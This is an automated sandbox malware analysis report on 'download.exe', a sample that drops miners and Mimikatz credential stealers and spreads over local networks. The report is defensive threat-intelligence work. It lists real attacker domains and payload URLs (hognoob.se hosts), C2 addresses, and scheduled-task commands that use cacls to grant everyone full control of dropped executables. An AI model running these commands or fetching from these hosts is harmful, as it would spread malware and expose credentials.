ID: 132586
Sample Name: download.exe
Cookbook: default.jbs
Time: 17:14:26
Date: 16/05/2019
Version: 26.0.0 Aquamarine
Table of Contents
Analysis Report download.exe
  Overview
    General Information
    Detection
    Confidence
    Classification
    Analysis Advice
    Mitre Att&ck Matrix
    Signature Overview
      AV Detection
      Exploits
      Privilege Escalation
      Bitcoin Miner
      Spreading
      Networking
      Key, Mouse, Clipboard, Microphone and Screen Capturing
      Spam, unwanted Advertisements and Ransom Demands
      System Summary
      Data Obfuscation
      Persistence and Installation Behavior
      Boot Survival
      Hooking and other Techniques for Hiding and Protection
      Malware Analysis System Evasion
      Anti Debugging
      HIPS / PFW / Operating System Protection Evasion
      Language, Device and Operating System Detection
      Lowering of HIPS / PFW / Operating System Security Settings
    Behavior Graph
    Simulations
      Behavior and APIs
    Antivirus and Machine Learning Detection
      Initial Sample
      Dropped Files
      Unpacked PE Files
      Domains
      URLs
    Yara Overview
      Initial Sample
      PCAP (Network Traffic)
      Dropped Files
      Memory Dumps
      Unpacked PEs
    Joe Sandbox View / Context
      IPs
      Domains
      ASN
      JA3 Fingerprints
      Dropped Files
    Screenshots
      Thumbnails
  Startup
  Created / dropped Files
  Domains and IPs
    Contacted Domains
    Contacted URLs
    URLs from Memory and Binaries
    Contacted IPs
      Public
      Private
Copyright Joe Security LLC 2019 Page 2 of 69
  Static File Info
    General
    File Icon
    Static PE Info
      General
      Entrypoint Preview
      Rich Headers
      Data Directories
      Sections
      Imports
  Network Behavior
    Network Port Distribution
    TCP Packets
    UDP Packets
    DNS Queries
    DNS Answers
    HTTP Request Dependency Graph
    HTTP Packets
  Code Manipulations
  Statistics
    Behavior
  System Behavior
    Analysis Process: download.exe PID: 3076 Parent PID: 3220
      General
      File Activities: File Created, File Deleted, File Moved, File Written
    Analysis Process: qwr4rt.exe PID: 3308 Parent PID: 3076
      General
      File Activities: File Created, File Moved, File Written
      Registry Activities: Key Value Created, Key Value Modified
    Analysis Process: ycemck.exe PID: 3268 Parent PID: 564
      General
      File Activities
    Analysis Process: sqlisrv.exe PID: 4748 Parent PID: 3076
      General
      File Activities: File Created, File Deleted, File Moved, File Written
    Analysis Process: cmd.exe PID: 1896 Parent PID: 4748
      General
      File Activities
    Analysis Process: cmd.exe PID: 4080 Parent PID: 3076
      General
      File Activities
    Analysis Process: conhost.exe PID: 2560 Parent PID: 1896
      General
    Analysis Process: conhost.exe PID: 4960 Parent PID: 4080
      General
    Analysis Process: PING.EXE PID: 2864 Parent PID: 1896
      General
      File Activities
    Analysis Process: certutil.exe PID: 3304 Parent PID: 4080
      General
      File Activities: File Written
    Analysis Process: b158ac7.exe PID: 5060 Parent PID: 1896
      General
    Analysis Process: b158ac7.exe PID: 3356 Parent PID: 564
      General
      File Activities
        File Created, File Written, File Read
    Analysis Process: cmd.exe PID: 3968 Parent PID: 3356
      General
      File Activities
    Analysis Process: conhost.exe PID: 3384 Parent PID: 3968
      General
    Analysis Process: cmd.exe PID: 1576 Parent PID: 3968
      General
      File Activities
    Analysis Process: cacls.exe PID: 4728 Parent PID: 3968
      General
      File Activities: File Written
    Analysis Process: netsh.exe PID: 4864 Parent PID: 3356
      General
      File Activities: File Written
      Registry Activities
    Analysis Process: conhost.exe PID: 3340 Parent PID: 4864
      General
    Analysis Process: netsh.exe PID: 1784 Parent PID: 3356
      General
      File Activities: File Written
      Registry Activities
    Analysis Process: conhost.exe PID: 752 Parent PID: 1784
      General
    Analysis Process: cmd.exe PID: 2944 Parent PID: 3968
      General
    Analysis Process: cacls.exe PID: 3632 Parent PID: 3968
      General
    Analysis Process: cmd.exe PID: 4316 Parent PID: 3968
      General
    Analysis Process: cacls.exe PID: 1252 Parent PID: 3968
      General
    Analysis Process: sqlisrv.exe PID: 652 Parent PID: 4080
      General
    Analysis Process: cmd.exe PID: 4068 Parent PID: 3356
      General
    Analysis Process: conhost.exe PID: 2924 Parent PID: 4068
      General
    Analysis Process: GogoleUpadte.exe PID: 284 Parent PID: 4068
      General
    Analysis Process: cmd.exe PID: 1252 Parent PID: 3356
      General
    Analysis Process: cmd.exe PID: 1524 Parent PID: 3356
      General
    Analysis Process: conhost.exe PID: 3968 Parent PID: 1252
      General
    Analysis Process: conhost.exe PID: 1068 Parent PID: 1524
      General
    Analysis Process: vfshost.exe PID: 4240 Parent PID: 1252
      General
    Analysis Process: ouousbpro.exe PID: 2940 Parent PID: 1524
      General
    Analysis Process: cmd.exe PID: 1644 Parent PID: 3356
      General
    Analysis Process: cmd.exe PID: 4448 Parent PID: 3356
      General
    Analysis Process: conhost.exe PID: 4244 Parent PID: 1644
      General
  Disassembly
    Code Analysis
Analysis Report download.exe
Overview
General Information
Joe Sandbox Version: 26.0.0 Aquamarine
Analysis ID: 132586
Start date: 16.05.2019
Start time: 17:14:26
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 15m 12s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: download.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of new started processes analysed: 41
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabled, EGA enabled, HDC enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.adwa.expl.evad.mine.winEXE@61/39@73/100
EGA Information: Successful, ratio: 85.7%
HDC Information: Successful, ratio: 12.7% (good quality ratio 11.9%)
Quality average: 69.7%
Quality standard deviation: 26.6%
HCA Information: Failed
Cookbook Comments: Adjust boot time; Enable AMSI; Found application associated with file extension: .exe
Warnings:
Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
TCP Packets have been reduced to 100
Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, CompatTelRunner.exe
Execution Graph export aborted for target b158ac7.exe, PID 3356 because it is empty
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Detection
Strategy | Score | Range | Reporting | Whitelisted | Detection
Threshold | 100 | 0 - 100 | | false |
Confidence
Strategy | Score | Range | Further Analysis Required? | Confidence
Threshold | 5 | 0 - 5 | false |
Classification
[Classification chart: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader and Miner, each rated on a clean / suspicious / malicious scale; the resulting label is the Classification field under General Information]
Analysis Advice
Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
Mitre Att&ck Matrix
(one technique per column and row; the numbers after a technique name are the matched signature counts shown in the report)

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control
Valid Accounts | Execution through API 1 | File System Permissions Weakness 1 | File System Permissions Weakness 1 | Disabling Security Tools 1 | Credential Dumping 1 | System Time Discovery 2 | Remote File Copy 1 2 | Input Capture 1 | Data Encrypted 1 | Uncommonly Used Port 2
Replication Through Removable Media | Service Execution 2 | Hooking 1 | Hooking 1 | Software Packing 1 2 1 | Hooking 1 | Security Software Discovery 1 3 1 | Remote Services | Data from Removable Media | Exfiltration Over Other Network Medium | Commonly Used Port 1
Drive-by Compromise | Windows Management Instrumentation | Modify Existing Service 3 1 | Process Injection 1 1 | Deobfuscate/Decode Files or Information 1 | Input Capture 1 | File and Directory Discovery 2 | Windows Remote Management | Data from Network Shared Drive | Automated Exfiltration | Remote File Copy 1 2
Exploit Public-Facing Application | Scheduled Task | New Service 2 3 | New Service 2 3 | File Deletion 1 | Credentials in Files | System Information Discovery 1 3 | Logon Scripts | Input Capture | Data Encrypted | Standard Cryptographic Protocol 1
Spearphishing Link | Command-Line Interface | Shortcut Modification | File System Permissions Weakness | Obfuscated Files or Information 2 1 | Account Manipulation | Query Registry 1 | Shared Webroot | Data Staged | Scheduled Transfer | Standard Non-Application Layer Protocol 2
Spearphishing Attachment | Graphical User Interface | Modify Existing Service | New Service | Masquerading 1 3 | Brute Force | Process Discovery 1 | Third-party Software | Screen Capture | Data Transfer Size Limits | Standard Application Layer Protocol 2 2
Spearphishing via Service | Scripting | Path Interception | Scheduled Task | Process Injection 1 1 | Two-Factor Authentication Interception | Application Window Discovery 1 | Pass the Hash | Email Collection | Exfiltration Over Command and Control Channel | Uncommonly Used Port
Supply Chain Compromise | Third-party Software | Logon Scripts | Process Injection | DLL Side-Loading 1 | Bash History | Remote System Discovery 1 1 | Remote Desktop Protocol | Clipboard Data | Exfiltration Over Alternative Protocol | Standard Application Layer Protocol
Trusted Relationship | Rundll32 | DLL Search Order Hijacking | Service Registry Permissions Weakness | Indicator Removal on Host 1 | Input Prompt | System Network Configuration Discovery 2 | Windows Admin Shares | Automated Collection | Exfiltration Over Physical Medium | Multilayer Encryption
Signature Overview
• AV Detection
• Exploits
• Privilege Escalation
• Bitcoin Miner
• Spreading
• Networking
• Key, Mouse, Clipboard, Microphone and Screen Capturing
• Spam, unwanted Advertisements and Ransom Demands
• System Summary
• Data Obfuscation
• Persistence and Installation Behavior
• Boot Survival
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• HIPS / PFW / Operating System Protection Evasion
• Language, Device and Operating System Detection
• Lowering of HIPS / PFW / Operating System Security Settings
AV Detection:
Antivirus or Machine Learning detection for dropped file
Antivirus or Machine Learning detection for sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Antivirus or Machine Learning detection for unpacked file
Exploits:
Connects to many different private IPs (likely to spread or exploit)
Privilege Escalation:
Detected Hacktool Mimikatz
Bitcoin Miner:
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Spreading:
Contains functionality to enumerate / list files inside a directory
Networking:
Connects to many ports of the same IP (likely port scanning)
Detected TCP or UDP traffic on non-standard ports
May check the online IP address of the machine
Uses known network protocols on non-standard ports
Uses ping.exe to check the status of other devices and networks
Connects to country known for bullet proof hosters
Downloads executable code via HTTP
IP address seen in connection with other malware
Uses a known web browser user agent for HTTP communication
Contains functionality to download additional files from the internet
Downloads files from webservers via HTTP
Performs DNS lookups
Urls found in memory or binary data
Key, Mouse, Clipboard, Microphone and Screen Capturing:
Creates a DirectInput object (often for capturing keystrokes)
Spam, unwanted Advertisements and Ransom Demands:
Modifies the hosts file
System Summary:
Uses Windows Living Off The Land Binaries (LOLBins)
Contains functionality to call native functions
Contains functionality to delete services
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
Creates mutexes
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Found potential string decryption / allocating functions
Reads the hosts file
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Yara signature match
PE file has section (not .text) which is very likely to contain packed code (zlib compression ratio < 0.011)
Classification label
Contains functionality to create services
Contains functionality to load and extract PE file embedded resources
Contains functionality to modify services (start/stop/modify)
Contains functionality to register a service control handler (likely the sample is a service DLL)
Creates files inside the user directory
Creates temporary files
Reads ini files
Reads software policies
Sample is known by Antivirus
Sample might require command line arguments (.Net)
Spawns processes
Uses an in-process (OLE) Automation server
Found graphical window changes (likely an installer)
Binary contains paths to debug symbols
Data Obfuscation:
Contains functionality to dynamically determine API calls
File is packed with WinRar
PE file contains sections with non-standard names
Uses code obfuscation techniques (call, push, ret)
Sample is packed with UPX
Persistence and Installation Behavior:
Drops executables to the windows directory (C:\Windows) and starts them
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Boot Survival:
Creates or modifies windows services
Modifies existing windows services
Contains functionality to start windows services
Hooking and other Techniques for Hiding and Protection:
May modify the system service descriptor table (often done to hook functions)
Moves itself to temp directory
Uses known network protocols on non-standard ports
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to clear windows event logs (to hide its activities)
Uses cacls to modify the permissions of files
Disables application error messages (SetErrorMode)
Malware Analysis System Evasion:
Contains functionality to detect sleep reduction / modifications
Uses ping.exe to sleep
Contains functionality for execution timing, often used to detect debuggers
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to enumerate / list files inside a directory
Contains functionality to query system information
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Program exit points
Queries a list of all running processes
Anti Debugging:
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
Contains functionality to register its own exception handler
HIPS / PFW / Operating System Protection Evasion:
System process connects to network (likely due to code injection or exploit)
Modifies the hosts file
Creates a process in suspended mode (likely to inject code)
Language, Device and Operating System Detection:
Queries the volume information (name, serial number etc) of a device
Contains functionality to query local / system time
Contains functionality to query time zone information
Contains functionality to query windows version
Queries the cryptographic machine GUID
Lowering of HIPS / PFW / Operating System Security Settings:
Modifies the hosts file
Uses netsh to modify the Windows network and firewall settings
Behavior Graph
[Behavior graph (rendered figure); the node labels recovered from it are listed below]
ID: 132586
Sample: download.exe
Startdate: 16/05/2019
Architecture: WINDOWS
Score: 100

Processes shown in the graph: download.exe, b158ac7.exe (two instances), ycemck.exe, sqlisrv.exe (two instances), qwr4rt.exe, cmd.exe (several instances), certutil.exe, conhost.exe (several instances), PING.EXE, GogoleUpadte.exe, vfshost.exe; further nodes are collapsed as "5 other processes", "7 other processes", "2 other processes" and "3 other processes".

Files dropped:
C:\WebKitSdk\2.25.14\sqlisrv.exe, PE32
C:\WebKitSdk\2.25.14\qwr4rt.exe, PE32
C:\Windows\System32\drivers\etc\hosts, ASCII
C:\Windows\cc3d3243\b158ac7.exe, PE32
C:\Windows\SysWOW64\ycemck.exe, PE32
C:\Windows\Temp\sqlisrv.exe, PE32
C:\Users\user\AppData\...\sqlisrv[1].exe, PE32
C:\Users\...\C4E91F59715AA0FB54843EB617B4C0B5, PE32

Domains and IPs contacted:
pxx.hognoob.se, q1a.hognoob.se, fid.hognoob.se, plus "2 other IPs or domains"
upa1.hognoob.se: 172.104.161.101, ports 49809, 80, unknown, United States
upa2.hognoob.se: 172.105.237.113, ports 49810, 80, unknown, United States
uio.hognoob.se: 195.128.126.120, ports 49808, 63145, unknown, Russian Federation
192.168.0.1, port 6666, unknown, unknown
192.168.0.25, port 6666, unknown, unknown
192.168.0.10, port 6666, unknown, unknown
192.168.0.11, port 6666, unknown, unknown
127.0.0.1, unknown, unknown
"93 other IPs or domains"

Signatures attached to graph nodes:
Multi AV Scanner detection for domain / URL
Antivirus or Machine Learning detection for dropped file
Antivirus or Machine Learning detection for sample
16 other signatures
Moves itself to temp directory
Contains functionality to detect sleep reduction / modifications
Modifies the hosts file
Multi AV Scanner detection for dropped file
Drops executables to the windows directory (C:\Windows) and starts them
Uses Windows Living Off The Land Binaries (LOLBins)
Uses ping.exe to sleep
System process connects to network (likely due to code injection or exploit)
Connects to many different private IPs (likely to spread or exploit)

Legend: Process; Signature; Created File; DNS/IP Info; Is Dropped; Is Windows Process; Number of created Registry Values; Number of created Files; Visual Basic; Delphi; Java; .Net C# or VB.NET; C, C++ or other language; Is malicious; Internet
Simulations
Behavior and APIs
Time Type Description
17:15:36 API Interceptor 3x Sleep call for process: download.exe modified
17:15:41 API Interceptor 49x Sleep call for process: ycemck.exe modified
17:15:45 API Interceptor 1x Sleep call for process: certutil.exe modified
17:17:36 API Interceptor 47x Sleep call for process: b158ac7.exe modified
17:17:39 Task Scheduler Run new task: 355252544 path: cmd s>/c echo Y|cacls C:\Windows\TEMP\80244f85e\c54183.exe /p everyone:F
17:18:00 Task Scheduler Run new task: 93293e638 path: cmd s>/c C:\Windows\ime\b158ac7.exe
17:19:00 Task Scheduler Run new task: d95544aa8 path: cmd s>/c echo Y|cacls C:\Windows\cc3d3243\b158ac7.exe /p everyone:F
Antivirus and Machine Learning Detection
Initial Sample
Source Detection Scanner Label Link
download.exe 68% virustotal Browse
download.exe 100% Avira HEUR/AGEN.1011827
download.exe 100% Joe Sandbox ML
Dropped Files
Source Detection Scanner Label Link
C:\Windows\Temp\sqlisrv.exe 100% Avira HEUR/AGEN.1014767
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\sqlisrv[1].exe 100% Avira HEUR/AGEN.1014767
C:\WebKitSdk\2.25.14\sqlisrv.exe 100% Avira HEUR/AGEN.1014767
C:\Windows\SysWOW64\ycemck.exe 100% Avira TR/BAS.ServStart.xxjtz
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C4E91F59715AA0FB54843EB617B4C0B5 100% Avira HEUR/AGEN.1014767
C:\Windows\cc3d3243\b158ac7.exe 100% Avira HEUR/AGEN.1014767
C:\WebKitSdk\2.25.14\qwr4rt.exe 100% Avira TR/BAS.ServStart.xxjtz
C:\Windows\Temp\sqlisrv.exe 100% Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\sqlisrv[1].exe 100% Joe Sandbox ML
C:\WebKitSdk\2.25.14\sqlisrv.exe 100% Joe Sandbox ML
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C4E91F59715AA0FB54843EB617B4C0B5 100% Joe Sandbox ML
C:\Windows\cc3d3243\b158ac7.exe 100% Joe Sandbox ML
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C4E91F59715AA0FB54843EB617B4C0B5 74% virustotal Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\sqlisrv[1].exe 74% virustotal Browse
C:\WebKitSdk\2.25.14\qwr4rt.exe 79% virustotal Browse
C:\WebKitSdk\2.25.14\sqlisrv.exe 74% virustotal Browse
C:\Windows\SysWOW64\ycemck.exe 79% virustotal Browse
C:\Windows\Temp\sqlisrv.exe 74% virustotal Browse
C:\Windows\cc3d3243\b158ac7.exe 74% virustotal Browse
Unpacked PE Files
Source Detection Scanner Label Link Download
11.0.b158ac7.exe.400000.0.unpack 100% Avira TR/Crypt.XPACK.Gen Download File
36.0.vfshost.exe.7ff607270000.0.unpack 100% Avira HEUR/AGEN.1013725 Download File
4.2.sqlisrv.exe.400000.0.unpack 100% Avira TR/Crypt.XPACK.Gen Download File
2.2.qwr4rt.exe.400000.0.unpack 100% Avira HEUR/AGEN.1007501 Download File
2.0.qwr4rt.exe.400000.0.unpack 100% Avira TR/BAS.ServStart.xxjtz Download File
11.2.b158ac7.exe.400000.0.unpack 100% Avira TR/Crypt.XPACK.Gen Download File
0.0.download.exe.400000.0.unpack 100% Avira TR/Crypt.XPACK.Gen Download File
4.0.sqlisrv.exe.400000.0.unpack 100% Avira TR/Crypt.XPACK.Gen Download File
3.2.ycemck.exe.400000.0.unpack 100% Avira HEUR/AGEN.1007501 Download File
27.0.sqlisrv.exe.400000.0.unpack 100% Avira TR/Crypt.XPACK.Gen Download File
4.1.sqlisrv.exe.400000.0.unpack 100% Avira TR/Crypt.XPACK.Gen Download File
12.1.b158ac7.exe.400000.0.unpack 100% Avira TR/Crypt.XPACK.Gen Download File
0.2.download.exe.400000.0.unpack 100% Avira TR/Crypt.XPACK.Gen Download File
3.1.ycemck.exe.400000.0.unpack 100% Avira HEUR/AGEN.1007501 Download File
3.0.ycemck.exe.400000.0.unpack 100% Avira TR/BAS.ServStart.xxjtz Download File
27.2.sqlisrv.exe.400000.0.unpack 100% Avira TR/Crypt.XPACK.Gen Download File
12.0.b158ac7.exe.400000.0.unpack 100% Avira TR/Crypt.XPACK.Gen Download File
27.1.sqlisrv.exe.400000.0.unpack 100% Avira TR/Crypt.XPACK.Gen Download File
2.1.qwr4rt.exe.400000.0.unpack 100% Avira HEUR/AGEN.1007501 Download File
0.1.download.exe.400000.0.unpack 100% Avira TR/Crypt.XPACK.Gen Download File
11.1.b158ac7.exe.400000.0.unpack 100% Avira TR/Crypt.XPACK.Gen Download File
11.0.b158ac7.exe.400000.0.unpack 100% Joe Sandbox ML Download File
4.2.sqlisrv.exe.400000.0.unpack 100% Joe Sandbox ML Download File
2.2.qwr4rt.exe.400000.0.unpack 100% Joe Sandbox ML Download File
11.2.b158ac7.exe.400000.0.unpack 100% Joe Sandbox ML Download File
0.0.download.exe.400000.0.unpack 100% Joe Sandbox ML Download File
4.0.sqlisrv.exe.400000.0.unpack 100% Joe Sandbox ML Download File
12.2.b158ac7.exe.400000.0.unpack 100% Joe Sandbox ML Download File
3.2.ycemck.exe.400000.0.unpack 100% Joe Sandbox ML Download File
27.0.sqlisrv.exe.400000.0.unpack 100% Joe Sandbox ML Download File
4.1.sqlisrv.exe.400000.0.unpack 100% Joe Sandbox ML Download File
12.1.b158ac7.exe.400000.0.unpack 100% Joe Sandbox ML Download File
0.2.download.exe.400000.0.unpack 100% Joe Sandbox ML Download File
3.1.ycemck.exe.400000.0.unpack 100% Joe Sandbox ML Download File
27.2.sqlisrv.exe.400000.0.unpack 100% Joe Sandbox ML Download File
12.0.b158ac7.exe.400000.0.unpack 100% Joe Sandbox ML Download File
27.1.sqlisrv.exe.400000.0.unpack 100% Joe Sandbox ML Download File
2.1.qwr4rt.exe.400000.0.unpack 100% Joe Sandbox ML Download File
0.1.download.exe.400000.0.unpack 100% Joe Sandbox ML Download File
11.1.b158ac7.exe.400000.0.unpack 100% Joe Sandbox ML Download File
Domains
Source Detection Scanner Label Link
haq.hognoob.se 6% virustotal Browse
URLs
Source Detection Scanner Label Link
fid.hognoob.se/sqlisrv.exeC: 0% Avira URL Cloud safe
uio.hognoob.se:63145/cfg.inihttp://uio.heroherohero.info:63145/cfg.inihognoob 0% Avira URL Cloud safe
fid.hognoob.se/sqlisrv.exe 19% virustotal Browse
fid.hognoob.se/sqlisrv.exe 0% Avira URL Cloud safe
truehttp://fid.hognoob.se/download.exeoffpxi.hognoob.se:35791pxx.hognoob.se:357891.updateIME 0% Avira URL Cloud safe
u2. 0% Avira URL Cloud safe
fid.hognoob.se/download.exeC: 0% Avira URL Cloud safe
fid.hognoob.se/download.execmd.exe 0% Avira URL Cloud safe
Yara Overview
Initial Sample
No yara matches
PCAP (Network Traffic)
No yara matches
Dropped Files
Source Rule Description Author
C:\Windows\5c2a55da8\Corporate\log.txt Mimikatz_Logfile Detects a log file generated by malicious hack tool mimikatz Florian Roth
Memory Dumps
Source Rule Description Author
00000024.00000002.6192286869.00007FF607342000.00000040.sdmp mimikatz mimikatz Benjamin DELPY (gentilkiwi)
00000024.00000002.6190697970.00007FF607271000.00000040.sdmp Powerkatz_DLL_Generic Detects Powerkatz - a Mimikatz version prepared to run in memory via Powershell (overlap with other Mimikatz versions is possible) Florian Roth
00000000.00000002.5123455439.0000000000767000.00000004.sdmp Certutil_Decode_OR_Download Certutil Decode Florian Roth
00000000.00000002.5112633665.0000000000540000.00000004.sdmp Certutil_Decode_OR_Download Certutil Decode Florian Roth
00000004.00000001.5091079042.000000000058C000.00000080.sdmp mimikatz mimikatz Benjamin DELPY (gentilkiwi)
00000004.00000001.5091079042.000000000058C000.00000080.sdmp hacktool_windows_mimikatz_errors Mimikatz credential dump tool: Error messages @fusionrace
00000004.00000001.5091079042.000000000058C000.00000080.sdmp hacktool_windows_mimikatz_sekurlsa Mimikatz credential dump tool @fusionrace
00000024.00000001.6149235365.00007FF607342000.00000080.sdmp mimikatz mimikatz Benjamin DELPY (gentilkiwi)
00000000.00000002.5104166883.0000000000401000.00000040.sdmp Certutil_Decode_OR_Download Certutil Decode Florian Roth
0000000B.00000001.5183737893.000000000058C000.00000080.sdmp mimikatz mimikatz Benjamin DELPY (gentilkiwi)
0000000B.00000001.5183737893.000000000058C000.00000080.sdmp hacktool_windows_mimikatz_errors Mimikatz credential dump tool: Error messages @fusionrace
0000000B.00000001.5183737893.000000000058C000.00000080.sdmp hacktool_windows_mimikatz_sekurlsa Mimikatz credential dump tool @fusionrace
00000024.00000001.6146216390.00007FF607301000.00000080.sdmp Powerkatz_DLL_Generic Detects Powerkatz - a Mimikatz version prepared to run in memory via Powershell (overlap with other Mimikatz versions is possible) Florian Roth
0000001B.00000001.5573571405.000000000058C000.00000080.sdmp mimikatz mimikatz Benjamin DELPY (gentilkiwi)
0000001B.00000001.5573571405.000000000058C000.00000080.sdmp hacktool_windows_mimikatz_errors Mimikatz credential dump tool: Error messages @fusionrace
0000001B.00000001.5573571405.000000000058C000.00000080.sdmp hacktool_windows_mimikatz_sekurlsa Mimikatz credential dump tool @fusionrace
0000000B.00000002.5202663261.0000000000401000.00000040.sdmp mimikatz mimikatz Benjamin DELPY (gentilkiwi)
0000000B.00000002.5202663261.0000000000401000.00000040.sdmp hacktool_windows_mimikatz_errors Mimikatz credential dump tool: Error messages @fusionrace
0000000B.00000002.5202663261.0000000000401000.00000040.sdmp hacktool_windows_mimikatz_sekurlsa Mimikatz credential dump tool @fusionrace
00000004.00000002.5101425693.0000000000401000.00000040.sdmp mimikatz mimikatz Benjamin DELPY (gentilkiwi)
00000004.00000002.5101425693.0000000000401000.00000040.sdmp hacktool_windows_mimikatz_errors Mimikatz credential dump tool: Error messages @fusionrace
00000004.00000002.5101425693.0000000000401000.00000040.sdmp hacktool_windows_mimikatz_sekurlsa Mimikatz credential dump tool @fusionrace
0000000C.00000001.5206506082.0000000000401000.00000040.sdmp mimikatz mimikatz Benjamin DELPY (gentilkiwi)
0000000C.00000001.5206506082.0000000000401000.00000040.sdmp hacktool_windows_mimikatz_errors Mimikatz credential dump tool: Error messages @fusionrace
0000000C.00000001.5206506082.0000000000401000.00000040.sdmp hacktool_windows_mimikatz_sekurlsa Mimikatz credential dump tool @fusionrace
0000001B.00000002.5578674251.0000000000401000.00000040.sdmp mimikatz mimikatz Benjamin DELPY (gentilkiwi)
0000001B.00000002.5578674251.0000000000401000.00000040.sdmp hacktool_windows_mimikatz_errors Mimikatz credential dump tool: Error messages @fusionrace
0000001B.00000002.5578674251.0000000000401000.00000040.sdmp hacktool_windows_mimikatz_sekurlsa Mimikatz credential dump tool @fusionrace
Unpacked PEs
Source Rule Description Author
36.1.vfshost.exe.7ff607270000.0.unpack Powerkatz_DLL_Generic Detects Powerkatz - a Mimikatz version prepared to run in memory via Powershell (overlap with other Mimikatz versions is possible) Florian Roth
36.1.vfshost.exe.7ff607270000.0.unpack mimikatz mimikatz Benjamin DELPY (gentilkiwi)
36.1.vfshost.exe.7ff607270000.0.unpack Mimikatz_Strings Detects Mimikatz strings Florian Roth
36.1.vfshost.exe.7ff607270000.0.unpack Mimikatz_Gen_Strings Detects Mimikatz by using some special strings Florian Roth
36.2.vfshost.exe.7ff607270000.0.unpack Powerkatz_DLL_Generic Detects Powerkatz - a Mimikatz version prepared to run in memory via Powershell (overlap with other Mimikatz versions is possible) Florian Roth
36.2.vfshost.exe.7ff607270000.0.unpack mimikatz mimikatz Benjamin DELPY (gentilkiwi)
36.2.vfshost.exe.7ff607270000.0.unpack Mimikatz_Strings Detects Mimikatz strings Florian Roth
36.2.vfshost.exe.7ff607270000.0.unpack Mimikatz_Gen_Strings Detects Mimikatz by using some special strings Florian Roth
12.2.b158ac7.exe.400000.0.unpack Ping_Command_in_EXE Detects an suspicious ping command execution in an executable Florian Roth
27.1.sqlisrv.exe.400000.0.unpack mimikatz mimikatz Benjamin DELPY (gentilkiwi)
27.1.sqlisrv.exe.400000.0.unpack Mimikatz_Strings Detects Mimikatz strings Florian Roth
27.1.sqlisrv.exe.400000.0.unpack hacktool_windows_mimikatz_errors Mimikatz credential dump tool: Error messages @fusionrace
27.1.sqlisrv.exe.400000.0.unpack hacktool_windows_mimikatz_sekurlsa Mimikatz credential dump tool @fusionrace
4.1.sqlisrv.exe.400000.0.unpack mimikatz mimikatz Benjamin DELPY (gentilkiwi)
4.1.sqlisrv.exe.400000.0.unpack Mimikatz_Strings Detects Mimikatz strings Florian Roth
4.1.sqlisrv.exe.400000.0.unpack hacktool_windows_mimikatz_errors Mimikatz credential dump tool: Error messages @fusionrace
4.1.sqlisrv.exe.400000.0.unpack hacktool_windows_mimikatz_sekurlsa Mimikatz credential dump tool @fusionrace
11.1.b158ac7.exe.400000.0.unpack mimikatz mimikatz Benjamin DELPY (gentilkiwi)
11.1.b158ac7.exe.400000.0.unpack Mimikatz_Strings Detects Mimikatz strings Florian Roth
11.1.b158ac7.exe.400000.0.unpack hacktool_windows_mimikatz_errors Mimikatz credential dump tool: Error messages @fusionrace
11.1.b158ac7.exe.400000.0.unpack hacktool_windows_mimikatz_sekurlsa Mimikatz credential dump tool @fusionrace
11.2.b158ac7.exe.400000.0.unpack mimikatz mimikatz Benjamin DELPY (gentilkiwi)
11.2.b158ac7.exe.400000.0.unpack Mimikatz_Strings Detects Mimikatz strings Florian Roth
11.2.b158ac7.exe.400000.0.unpack Ping_Command_in_EXE Detects an suspicious ping command execution in an executable Florian Roth
11.2.b158ac7.exe.400000.0.unpack hacktool_windows_mimikatz_errors Mimikatz credential dump tool: Error messages @fusionrace
11.2.b158ac7.exe.400000.0.unpack hacktool_windows_mimikatz_sekurlsa Mimikatz credential dump tool @fusionrace
4.2.sqlisrv.exe.400000.0.unpack mimikatz mimikatz Benjamin DELPY (gentilkiwi)
